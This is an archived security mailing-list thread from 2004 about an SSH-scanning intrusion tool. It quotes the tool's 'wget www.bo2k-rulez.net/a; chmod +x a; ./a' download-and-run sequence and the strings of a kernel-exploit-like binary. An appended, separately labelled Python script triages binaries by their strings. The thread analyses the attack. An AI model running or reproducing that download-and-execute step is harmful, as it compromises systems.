Message-ID: <05e701c48bd4$42320b00$5746370a@nsp.co.nz>
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Betr.: RE: Automated ssh scanning
LOL that file is infected with rst.b and you ran it?? Hope it was inside a
chroot(), otherwise time to replace every ELF binary >:)
----- Original Message -----
From: "Blue Boar" <BlueBoar@...evco.com>
To: "Todd Towles" <toddtowles@...okshires.com>
Cc: "Pascal Zoutendijk" <Pascal.Zoutendijk@...a.nl>; "Mailing List -
Full-Disclosure" <full-disclosure@...ts.netsys.com>
Sent: Friday, August 27, 2004 9:12 AM
Subject: Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning
> Todd Towles wrote:
>
>> It could be, but he said it was patched. I didn't run the test of
>> course. I never said it was the kernel however, it could be a service
>> running.
>> And unknown does not equal zero-day. But the tool got root and he
>> doesn't know how. That is the point. Kernel, old service, whatever. It
>> would be nice to find it.
>
> If you take a look at this bit:
>
> wget www.bo2k-rulez.net/a
> chmod +x a
> ./a
>
> The file "a" gives every superficial indication that it's a kernel
> exploit, if you want to go by a 20-second Notepad analysis:
>
> [-] Unable to exit, entering neverending loop.
> Kernel seems not to be vulnerable double allocation
> Unable to determine kernel address Unable to set up LDT Unable
> to change page protection Invalid LDT entry Unable to jump to call gate
> /bin/sh Unable to spawn shell
> PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to allocate
> memory Unable to unmap stack Unable to expand BSS
> /proc/sys/kernel/osrelease FATAL: kernel too old
> FATAL: cannot determine library version
> /dev/null ;?..;?..(?..??..??.. malloc: using
> debugging hooks
> realloc(): invalid pointer %p!
> malloc: top chunk is corrupt
> Arena %d:
> system bytes = %10u
> in use bytes = %10u
> Total (incl. mmap):
> max mmap regions = %10u
> max mmap bytes = %10lu
> free(): invalid pointer %p!
> TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_
>
> BB
>
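Added example, not part of the original message or of any tool named in the thread: a small Python triage that repeats the "20-second" string analysis and separates C-runtime messages from payload-specific ones. The marker lists and the sample bytes are constructed here from the strings quoted above. The allocator and `FATAL:` lines are treated as glibc text that any statically linked binary carries, so "FATAL: kernel too old" is not counted as a kernel-exploit indicator.

```python
import re

# Fragments of glibc allocator/startup messages from the quoted output.
# Assumption of this example: these come from a statically linked libc.
RUNTIME = ("malloc:", "realloc():", "free():", "Arena %d", "mmap",
           "FATAL:", "/proc/sys/kernel/osrelease", "TOP_PAD_", "_THRESHOLD_")
# Payload-specific terms, also taken from the quoted output (lower case).
KERNEL = ("kernel", "ldt", "call gate", "page protection")
SHELL = ("/bin/sh", "spawn shell", "path=")

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Like strings(1): runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii").strip() for m in re.finditer(pattern, data)]

def triage(data: bytes) -> dict[str, list[str]]:
    """Bucket strings; runtime noise is checked first so it cannot mislead."""
    report = {"runtime": [], "kernel": [], "shell": [], "other": []}
    for s in extract_strings(data):
        low = s.lower()
        if any(m in s for m in RUNTIME):
            report["runtime"].append(s)
        elif any(t in low for t in SHELL):
            report["shell"].append(s)
        elif any(t in low for t in KERNEL):
            report["kernel"].append(s)
        else:
            report["other"].append(s)
    return report

# Constructed sample: a fake header plus NUL-separated strings from the post.
SAMPLE = b"\x7fELF\x01\x01\x01\x00" + b"\x00".join([
    b"[-] Unable to exit, entering neverending loop.",
    b"Kernel seems not to be vulnerable",
    b"Unable to set up LDT",
    b"Unable to jump to call gate",
    b"/bin/sh",
    b"Unable to spawn shell",
    b"/proc/sys/kernel/osrelease",
    b"FATAL: kernel too old",
    b"malloc: top chunk is corrupt",
    b"free(): invalid pointer %p!",
    b"\x01\x02\x03",
])

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE).items():
        print(f"{bucket:8} {len(items):2}  {items}")
```

String triage only reads the file and never executes it; it says nothing about whether the file also carries a file infector, which is the concern raised in the reply.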